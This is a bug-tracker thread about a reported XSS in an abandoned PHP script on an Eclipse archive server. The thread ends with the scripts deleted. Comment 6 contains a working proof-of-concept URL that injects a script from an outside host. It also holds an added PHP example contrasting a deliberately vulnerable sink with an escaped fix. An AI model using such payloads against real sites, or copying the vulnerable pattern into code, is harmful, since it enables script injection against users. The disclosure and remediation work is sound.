Bug 580460 - XSS vulnerability - /downloads-viewer.php?s=
Summary: XSS vulnerability - /downloads-viewer.php?s=
Status: CLOSED FIXED
Alias: None
Product: Community
Classification: Eclipse Foundation
Component: Vulnerability Reports
Version: unspecified
Hardware: All All
Importance: P3 major
Target Milestone: ---
Assignee: Security vulnerabilities reported against Eclipse projects
Keywords: security
Reported: 2022-07-26 20:44 EDT by Nicolas Armua
Modified: 2022-08-02 08:27 EDT
CC List: 3 users
Comment 1 Mikaël Barbero 2022-07-29 10:02:40 EDT
@Ed, WDYT?
Comment 2 Nicolas Armua 2022-07-29 10:04:37 EDT
This is an XSS vulnerability, do you know what it is?
Comment 3 Ed Merks 2022-07-29 10:18:28 EDT
I have no idea how those got there. They look to be extremely old files with all kinds of crazy old stuff.

https://archive.eclipse.org/justj/?file=tools/emf/scripts

It looks like someone copied a backup and left it to rot...
Comment 4 Nicolas Armua 2022-07-29 10:22:17 EDT
OK, this is a bug
Comment 5 Mikaël Barbero 2022-07-29 11:25:57 EDT
@Ed, would you mind removing the files if you can?
Comment 6 Nicolas Armua 2022-07-29 11:28:22 EDT
I did not upload those files, I only found a JavaScript injection in that domain:

https://archive.eclipse.org/tools/emf/scripts/downloads-viewer.php?s=testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://BitterAcceptableRegister.mexicanoss.repl.co/script.js%3E%3C/script%3E

Do you know what this is?

JavaScript injections are processes where you can insert and use your own JavaScript code on a page, either by entering the code in the address bar or by finding a website's XSS vulnerability.
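The payload in the report (`testtest"};</script><script src=...></script>`) only works if the `s` query value is echoed unescaped inside a JavaScript object literal in an inline `<script>` block: the `"}` closes the string and object, and the HTML parser then ends the `<script>` element at the injected `</script>` regardless of the JavaScript context, so the attacker's `<script src=...>` is parsed as a fresh element. The following is an added illustration, not the Eclipse archive script (which the page never shows): the sink shape, the function names and the `attacker.example` host substituted for the reporter's domain are all assumptions.

```php
<?php
// Added illustration, not the Eclipse archive script: downloads-viewer.php
// itself is not on the page. The shape of the sink is inferred from the
// reported payload (testtest"};</script><script src=...></script>), which
// only fires if ?s= is echoed unescaped inside a JavaScript object literal
// in an inline <script>. Function names and the template are assumptions.
declare(strict_types=1);

// Assumed vulnerable shape: the raw query value is concatenated into JS source.
function render_vulnerable(string $s): string
{
    return '<script>var view = {"s":"' . $s . '"};</script>' . "\n";
}

// Hardened shape: emit the value as a JSON string literal with the
// HTML-significant characters hex-escaped. JSON_HEX_TAG turns < and > into
// \u003C and \u003E, so the emitted source can never contain "</script>" and
// the HTML parser cannot close the element early; JSON_HEX_QUOT turns " into
// \u0022, so the JS string cannot be terminated from inside the value.
function render_hardened(string $s): string
{
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
           | JSON_THROW_ON_ERROR;
    return '<script>var view = {"s":' . json_encode($s, $flags) . '};</script>' . "\n";
}

// Counts <script> start tags so the two renderings can be compared; the
// template itself contributes exactly one.
function script_tag_count(string $html): int
{
    return preg_match_all('/<script\b/i', $html);
}

// Constructed test input: the reporter's payload with the remote host swapped
// for a placeholder. urldecode() is used because the query encodes the space
// in "script src" as '+'.
$payload = urldecode(
    'testtest%22%7D%3B%3C/script%3E%3Cscript+src%3Dhttps://attacker.example/script.js%3E%3C/script%3E'
);

$renderings = [
    'vulnerable' => render_vulnerable($payload),
    'hardened'   => render_hardened($payload),
];
foreach ($renderings as $label => $html) {
    // vulnerable: 2 start tags (template + injected); hardened: 1
    printf("%-10s %d <script> tag(s): %s", $label, script_tag_count($html), $html);
}
```

Run it with `php example.php`: the vulnerable rendering contains two `<script` start tags, the hardened one only the template's own. Note that `htmlspecialchars()` alone is the wrong tool in this position, because the value sits inside JavaScript, not HTML text; the JSON encoding with the `JSON_HEX_*` flags is what keeps both the JS string and the `<script>` element intact. In this bug the scripts were orphaned copies with no owner, so deleting them (the outcome in comment 9) is the better fix than patching; the hardened form is for a script that has to stay.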
Comment 7 Mikaël Barbero 2022-07-29 12:24:04 EDT
@Nicolas, we get that.

As the PHP scripts you've detected the XSS in are rotten files, I was asking @Ed to just delete those scripts.
Comment 8 Ed Merks 2022-07-29 13:45:37 EDT
Sorry, I tried but I cannot remove them:

https://ci.eclipse.org/emf/job/promotion-shell/lastBuild/console
Comment 9 Mikaël Barbero 2022-08-02 08:27:08 EDT
I've removed all PHP scripts in that folder. Thanks.